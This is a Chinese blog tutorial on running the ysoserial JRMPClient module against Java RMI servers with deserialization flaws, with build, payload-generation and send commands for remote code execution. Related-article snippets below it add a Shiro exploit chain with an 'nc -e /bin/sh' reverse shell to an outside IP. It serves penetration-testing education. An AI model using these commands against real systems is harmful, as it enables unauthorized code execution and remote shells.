ysoserial.exploit.JRMPClient

于 2024-11-14 19:47:20 发布
阅读量627 收藏 7
点赞数 15
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_85480529/article/details/143779160
版权

ysoserial.exploit.JRMPClientysoserial 工具中的一个模块,常用于配合 Java RMI(远程方法调用)反序列化漏洞的攻击。与 JRMPListener 不同,JRMPClient 用于连接远程 RMI 服务器并向其发送恶意 payload。

使用场景

  • 漏洞环境:目标 RMI 服务端接受远程连接,并且会对客户端传入的数据进行反序列化。
  • 目的:通过 JRMPClient 连接到目标 RMI 服务器,并发送恶意的反序列化 payload,从而执行任意代码。

前置条件

  1. 需要 Java 环境ysoserial 工具(可以从 GitHub 上获取)。
  2. 目标服务器的 RMI 服务端存在反序列化漏洞,并且监听在某个端口上(如 1099)。

下载和编译 ysoserial

如果你还没有 ysoserial,可以通过以下方式下载并编译:

# 克隆 ysoserial 仓库
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial

# 编译 ysoserial
mvn clean package -DskipTests

编译成功后,会在 target 目录下生成 ysoserial-all.jar 文件。

使用 JRMPClient 的方法

假设目标服务器的 RMI 服务端存在反序列化漏洞,可以按照以下步骤操作:

1. 生成恶意 Payload

首先,使用 ysoserial 生成恶意的序列化 payload。以 CommonsCollections1 payload 为例:

java -jar ysoserial-all.jar CommonsCollections1 "calc" > payload.bin
  • 参数解释
    • CommonsCollections1:使用的 payload 类型。
    • "calc":要执行的命令(在 Windows 上会打开计算器)。
    • payload.bin:输出的序列化 payload 文件。
2. 使用 JRMPClient 发送 Payload

然后,通过 JRMPClient 连接到目标 RMI 服务器,并发送刚生成的 payload:

java -cp ysoserial-all.jar ysoserial.exploit.JRMPClient <target-host> <target-port> <payload>

  • 参数解释

    • <target-host>:目标 RMI 服务器的 IP 地址或域名。
    • <target-port>:目标 RMI 服务器的端口(通常为 1099)。
    • <payload>:使用的反序列化 payload(如 CommonsCollections1)。

  • 示例

    java -cp ysoserial-all.jar ysoserial.exploit.JRMPClient 192.168.1.10 1099 CommonsCollections1 "calc"

    这将连接到目标 RMI 服务器(IP 为 192.168.1.10,端口为 1099),并发送恶意 payload 以执行 calc 命令。

3. 通过预先生成的序列化文件发送

也可以将已生成的 payload.bin 文件直接发送:

cat payload.bin | java -cp ysoserial-all.jar ysoserial.exploit.JRMPClient <target-host> <target-port>

典型攻击流程

  1. 生成 payload:利用 ysoserial 生成反序列化 payload。
  2. 发送 payload:通过 JRMPClient 连接到目标 RMI 服务端,发送恶意数据。
  3. 触发漏洞:如果目标服务器存在反序列化漏洞,恶意命令将会在目标系统上执行。

注意事项

  • 防火墙:确保你的机器与目标服务器之间的网络连通性。
  • Java 版本:某些 payload 可能依赖特定的 Java 版本,建议在不同环境下测试。
  • 合法授权:此工具仅应用于合法的安全测试和漏洞验证中,禁止用于未经授权的攻击
  • 调试:如果攻击失败,可以尝试更换 payload 或调整目标端口。

通过以上方法,你可以使用 ysoserial.exploit.JRMPClient 对存在 RMI 反序列化漏洞的服务器进行测试。希望对你理解和利用 RMI 相关漏洞有所帮助!

2401_85480529
关注
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3783
ysoserial这款工具,堪称为“java反序列利用神器”。
《WEB安全渗透测试》(36) JAVA反序列化工具ysoserial使用介绍
午夜安全
05-31 2139
作者介绍:ysoserial是一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具。ysoserial其实就是工具,集合了各种java反序列化的payload,利用它可以方便的测试反序列化漏洞。
jrmp协议_ysoserial JRMP相关模块分析(二)- payloads/JRMPClient & exploit/JRMPListener
weixin_39876145的博客
12-24 774
简介payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的,payloads/JRMPClient 的利用,离不开 exploit/JRMPListener ,反之 exploit/JRMPListener 的利用,在上篇文章中,它是可以独立使用的这篇文章是记录 payloads/JRMPClient...
ysoserial payloads/JRMPClient
洋洋的小黑屋
07-27 587
ysoserial payloads/JRMPClient 环境:JDK8u102 payloads/JRMPClient可以配合exploit/JRMPListener模块来使用 1.在自己服务器上使用exploit/JRMPListener来开启监听 2.把payloads/JRMPClient发送给对方服务器,对方服务器反序列化后会反向连接我们的服务器,进行连接之间我们服务器会发送payload给对方服务器进行反序列化执行命令。 以下是执行ysoserial时候使用的命令: java -cp ysos
ysoserial之JRMP源码分析(payloads.JRMPClient/exploit.JRMPListener)
weixin_45682070的博客
03-11 1476
前言 本来是想复现weblogicCVE-2017-3248漏洞的,这个漏洞使用了ysoserial的jrmp模块,开启rmi监听进行通信的,达到执行任意反序列化 payload。下文有些概念比较晦涩难懂,建议查阅其他资料配合使用。 JRMP协议是什么 JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。 一个RMI的过程,是用到JRMP这个协议去组织数据格式然后通过TCP进行传输,从而达到RMI,也就是远程方法调用。 JRMP是一个协议,是用于Java RMI
ysoserial exploit/JRMPClient
洋洋的小黑屋
07-27 394
ysoserial exploit/JRMPClient 上一篇文章讲到,当服务器反序列化payloads/JRMPListener,即会开启端口监听。再使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 调用链分析 设置payloads/JRMPListener参数,端口号为1299,debug模式启动payloads/JRMPListener模块。 设置exploit/JRMPClient模块设置参数为127.0.0.1 1299
java 反序列化 ysoserial exploit/JRMPClient 原理剖析
whatday的专栏
06-26 3613
目录 0 前言 1payloads/JRMPListener 1.1 payload生成 1.2gadget链分析 2使用RMIRegistryExploit攻击上述开启的监听 3 exploit/JRMPClient 3.1分布式垃圾收集(DGC) 3.2exploit/JRMPClient代码分析 4 总结 0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:...
Java反序列化漏洞
ovowovo的博客
12-10 1133
Ysoserial 介绍 Ysoserial是国外一款安全工具,集合了各种java反序列化payload,下载地址: https://github.com/frohoff/ysoserial/ 使用方法 1、首先使用ysoserial在攻击机上启动一个 JRMP server,输入以下命令 java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.j...
Weblogic反序列化漏洞复现(CVE-2018-2628)
DaWan
09-21 1197
Weblogic反序列化漏洞(CVE-2018-2628环境搭建工具准备漏洞复现 环境搭建 使用vulhub进行环境搭建,具体的步骤可以自行百度 工具准备 下载ysoserial,为了启动JRMP Server EXP地址:https://www.exploit-db.com/exploits/44553 漏洞复现 使用namp查看是否启用T3协议: nmap -p 7001,7002 -T4 -A -v --script weblogic-t3-info 192.168.120.161 启动JRMP Se
JRMPClient 反序列化
01-26 990
JRMPClient 反序列化 当目标存在反序列化入口时,可以尝试构造反序列化链让目标在指定端口开启 JRMP 服务,这样我们就可以连接目标开启的 JRMP 服务进行一些后续操作。 Gadget /* * Gadget: * UnicastRemoteObject#readObject * UnicastRemoteObject#reexport * UnicastRemoteObject#exportObject * UnicastRemoteObject
ysoserial.jar
06-01
shrio反序裂化利用工具,JAVA反序裂化利用工具。 https://github.com/frohoff/ysoserial 源码编辑而来。 def generator(command, fp,key): if not os.path.exists(fp): print('Jar zai na ne ?') raise Exception('jar file not found!') popen = subprocess.Popen(['java', '-jar', fp, 'URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext 代码中需要的jar包
反序列化测试工具 ysoserial-master-v0.0.5 打包
05-21
用法 java -cp ysoserial-master-v0.0.5 ysoserial.exploit.RMIRegistryExploit 192.168.192.118 1099 CommonsCollections1 "notepad.exe"
SHIRO-550:Shiro RememberMe 1.2.4反序列化突破
03-10
Shiro RememberMe 1.2.4反序列化突破(SHIRO-550) commons-collections-3.2.1.jar java -jar ysoserial-0.0.6-SNAPSHOT-all.jar JRMPClient "10.10.20.166:12345" |python exp.py java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989' nc -nlvp 8989 python用法: python3 shiro_rce.py _____ _ _ _____ _____ ____ _____ _____ __
ysoserial-0.0.4-all.jar
09-17
ysoserial-0.0.4-all.jar系统自动生成分数,我也改不了,分数不够的可以联系我私发。
ysoserial-0.0.6-SNAPSHOT-all.jar
12-19
ysoserial-0.0.6 也可自行下载编译 提供个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
jrmp协议_Java远程方法调用RMI利用分析
weixin_28358083的博客
12-24 676
前提了解JNDIJNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JRMPJav...
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 3096
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
ysoserial笔记
公众号shadow sock7
10-22 5428
项目主页: https://github.com/frohoff/ysoserial Requires Java 1.7+ and Maven 3.x+ mvn clean package -DskipTests
ysoserial 编译成eclipse 项目
把梦想放飞在蓝色的天空里...
11-23 401
1. ysoserial 编译成eclipse项目: mvn eclipse:clean mvn eclipse:eclipse 再用eclipse打开项目。
掌握Shiro RememberMe 1.2.4远程代码执行漏洞
- `java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections5 'nc -e /bin/sh 192.168.5.86 8989'`:此命令用`ysoserial`的`JRMPListener`来监听端口12345,并当接收到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值